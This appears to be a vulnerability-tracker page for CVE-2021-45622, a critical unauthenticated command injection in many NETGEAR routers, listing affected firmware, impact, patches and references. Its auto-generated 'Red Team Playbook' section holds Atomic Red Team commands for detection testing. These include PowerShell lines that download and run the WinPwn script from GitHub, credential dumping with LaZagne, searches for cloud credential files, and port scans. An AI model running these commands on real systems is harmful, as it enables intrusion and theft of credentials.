CVE-2021-45622
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the firmware of multiple NETGEAR devices. The affected components fail to sanitize user-supplied inputs before passing them to system-level command execution functions, allowing injection of arbitrary commands. The flaw specifically impacts the firmware's command processing routines across various router and extender models.
Vulnerability Description
Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects CBR40 before 2.5.0.24, CBR750 before 4.6.3.6, EAX20 before 1.0.0.58, EAX80 before 1.0.1.68, EX7500 before 1.0.0.74, LAX20 before 1.1.6.28, MK62 before 1.0.6.116, MR60 before 1.0.6.116, MS60 before 1.0.6.116, R6400 before 1.0.1.70, R6400v2 before 1.0.4.118, R6700v3 before 1.0.4.118, R6900P before 1.3.3.140, R7000 before 1.0.11.116, R7000P before 1.3.3.140, R7850 before 1.0.5.68, R7900 before 1.0.4.38, R7900P before 1.4.2.84, R7960P before 1.4.2.84, R8000 before 1.0.4.68, R8000P before 1.4.2.84, RAX15 before 1.0.3.96, RAX20 before 1.0.3.96, RAX200 before 1.0.4.120, RAX35v2 before 1.0.3.96, RAX40v2 before 1.0.3.96, RAX43 before 1.0.3.96, RAX45 before 1.0.3.96, RAX50 before 1.0.3.96, RAX75 before 1.0.4.120, RAX80 before 1.0.4.120, RBK752 before 3.2.17.12, RBK852 before 3.2.17.12, RBR750 before 3.2.17.12, RBR850 before 3.2.17.12, RBS750 before 3.2.17.12, RBS850 before 3.2.17.12, RS400 before 1.5.1.80, XR1000 before 1.0.0.58, and XR300 before 1.0.3.68.
Impact
An unauthenticated attacker with network access can execute arbitrary commands on affected devices, potentially gaining full control over the system. This enables unauthorized manipulation of device configurations, disruption of network services, or pivoting within the local network. The attack requires no user interaction and leverages low-complexity network requests, as indicated by CVSS metrics AV:A/AC:L/PR:N/UI:N, making exploitation feasible in real-world scenarios where devices are exposed to untrusted networks.
Solution
NETGEAR has released firmware updates addressing this command injection vulnerability for all affected models, including CBR40 firmware version 2.5.0.24 and later, R7000P version 1.3.3.140 and later, and RBK752 version 3.2.17.12 and later. Administrators should consult the official NETGEAR security advisory (https://kb.netgear.com/000064509) for detailed patch instructions and promptly apply the recommended firmware updates to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A significant vulnerability has been identified in various NETGEAR devices, characterized by command injection that can be exploited by unauthenticated attackers. This flaw arises from improper validation of user inputs, allowing an attacker to inject arbitrary commands into the system. The affected devices span a wide range of NETGEAR's product line, including routers and extenders, with specific firmware versions being particularly vulnerable. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk to the confidentiality, integrity, and availability of the affected systems.
Attack vectors for this vulnerability are diverse and can be executed remotely, making it particularly alarming. An attacker could leverage this flaw by sending specially crafted requests to the vulnerable devices, thereby executing arbitrary commands on the underlying operating system. This could lead to unauthorized access to sensitive data, manipulation of device configurations, or even the establishment of persistent backdoors for further exploitation. Scenarios may include an attacker gaining control over the network traffic, redirecting users to malicious sites, or launching attacks against other devices on the same network, thereby amplifying the impact of the initial compromise.
The real-world implications of this vulnerability are substantial for both individual users and organizations. For home users, compromised devices can lead to privacy breaches, unauthorized surveillance, and loss of personal data. For businesses, the risks are even more pronounced; an attacker could exploit this vulnerability to infiltrate corporate networks, potentially leading to data breaches, financial losses, and reputational damage. Furthermore, the interconnected nature of modern devices means that a breach in one device can have cascading effects across an entire network, increasing the overall risk profile for organizations relying on these technologies.
To detect and mitigate this vulnerability, organizations and users should implement several strategies. Regularly updating firmware to the latest versions is crucial, as manufacturers typically release patches to address known vulnerabilities. Network monitoring tools can also be employed to detect unusual traffic patterns or unauthorized access attempts, which may indicate exploitation attempts. Additionally, employing network segmentation can limit the potential impact of a compromised device, isolating critical systems from less secure ones. Educating users about the importance of securing their devices and recognizing potential threats is also vital in reducing the risk associated with such vulnerabilities.
In conclusion, the command injection vulnerability affecting various NETGEAR devices represents a critical threat that can be exploited by attackers to gain unauthorized access and control over affected systems. The potential consequences of such exploitation are severe, impacting both individual users and organizations alike. By adopting proactive detection and mitigation strategies, stakeholders can significantly reduce their risk exposure and enhance their overall cybersecurity posture.
Affected Products (40)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Netgear | Cbr40 Firmware | All |
cpe:2.3:o:netgear:cbr40_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Cbr750 Firmware | All |
cpe:2.3:o:netgear:cbr750_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Eax20 Firmware | All |
cpe:2.3:o:netgear:eax20_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Eax80 Firmware | All |
cpe:2.3:o:netgear:eax80_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Ex7500 Firmware | All |
cpe:2.3:o:netgear:ex7500_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Lax20 Firmware | All |
cpe:2.3:o:netgear:lax20_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Mk62 Firmware | All |
cpe:2.3:o:netgear:mk62_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Mr60 Firmware | All |
cpe:2.3:o:netgear:mr60_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Ms60 Firmware | All |
cpe:2.3:o:netgear:ms60_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R6400v2 Firmware | All |
cpe:2.3:o:netgear:r6400v2_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R6700v3 Firmware | All |
cpe:2.3:o:netgear:r6700v3_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R6900p Firmware | All |
cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R7000 Firmware | All |
cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R7000p Firmware | All |
cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R7850 Firmware | All |
cpe:2.3:o:netgear:r7850_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R7900 Firmware | All |
cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R7900p Firmware | All |
cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R7960p Firmware | All |
cpe:2.3:o:netgear:r7960p_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R8000 Firmware | All |
cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | R8000p Firmware | All |
cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-45622 |
| kb.netgear.com |
GitHub CVE
x_refsource_MISC
|
https://kb.netgear.com/000064509/Security-Advisory-for-Pre-Authentication-Command-Injection-on-Some-Routers-Extender-WiFi-Systems-PSV-2020-0506 |